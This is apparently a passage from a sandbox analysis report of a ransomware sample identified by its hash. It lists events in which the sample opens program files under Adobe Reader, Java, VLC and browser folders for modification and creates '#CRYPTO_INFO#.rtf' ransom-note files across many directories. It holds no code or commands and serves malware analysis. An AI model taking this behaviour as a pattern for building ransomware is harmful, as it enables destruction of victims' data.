(x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\en-il\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\root\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\Confirmation.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ru-ru\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\leftnav.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-api_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\close.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\ca-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\themes\dark\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-favorites_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\ja-jp\AppStore_icon.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\es-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.core_5.5.0.165303.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.swt_3.103.1.v20140903-1938.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\nb-no\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\da-dk\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\pl-pl\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\bin\setNetworkClientCP 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\lib\jfluid-server.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Mozilla Firefox\precomplete 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_history_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_newfolder-default.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Measure.aapp 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\SY______.PFB 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\lt.pak 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\sv\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.jface_3.10.1.v20140813-1009.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-io_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\sd\jamendo.luac 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\ko-kr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ko-kr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\da-dk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\css\main-selector.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.nl_zh_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\bbc_co_uk.luac 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sk-sk\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\org-netbeans-core_visualvm.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\rhp_world_icon_hover_2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\createpdf.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\javaw.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.repository_2.3.0.v20131211-1531.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-templates_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ko-kr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\sk-sk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.jface.nl_ja_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\equalizer_window.html 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\extensions\VLSub.luac 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\japanese_over.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\lv_get.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_replace_signer_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\MyriadPro-Bold.otf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sv-se\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\messages_pt_BR.properties 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\ffjcext.zip 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\fontconfig.bfc 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\lib\locale\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-api-visual.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\triggerConstraints.exsd 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\themes\dark\close.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-javahelp_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\ext\zipfs.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\media_poster.jpg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\MakeAccessible.api 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\ca-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\pl-pl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\compare-2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\themes\dark\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\pop3.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.common_3.6.200.v20130402-1505.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\km\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_link_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\sl-si\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\ko_get.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\fi-fi\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\CompressDisconnect.ADT 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\images\cursors\win32_MoveDrop32x32.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\themes\dark\hscroll-thumb.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\illustrations.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\da-dk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ro-ro\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\[email protected] 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\ca-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.contenttype_3.4.200.v20140207-1251.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\nb-no\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\zh-tw\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\core\locale\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\cy\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\inline-error-1x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\en-ae\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\ECLIPSE_.SF 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\es-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\fr-fr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\as_IN\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\tr-tr\AppStore_icon.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\en-gb\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\find-text.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\plugin.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\currency.data 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\reviews_joined.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\JoinConnect.ex_ 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\convertpdf-tool-view.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\META-INF\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\da-dk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\jvisualvm.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-core-windows_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-api-annotations-common.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\pt-br\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\zh-cn\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\brx\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\fi-fi\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\ar-ae\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.attributeTransformation.exsd 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-awt_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-profiler_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\TrackedSend.aapp 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\en-ae\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\sl-si\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\bin\derby_common.bat 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\hi_contrast\core_icons_highcontrast_retina.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\nb-no\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\nl-nl\ui-strings.js 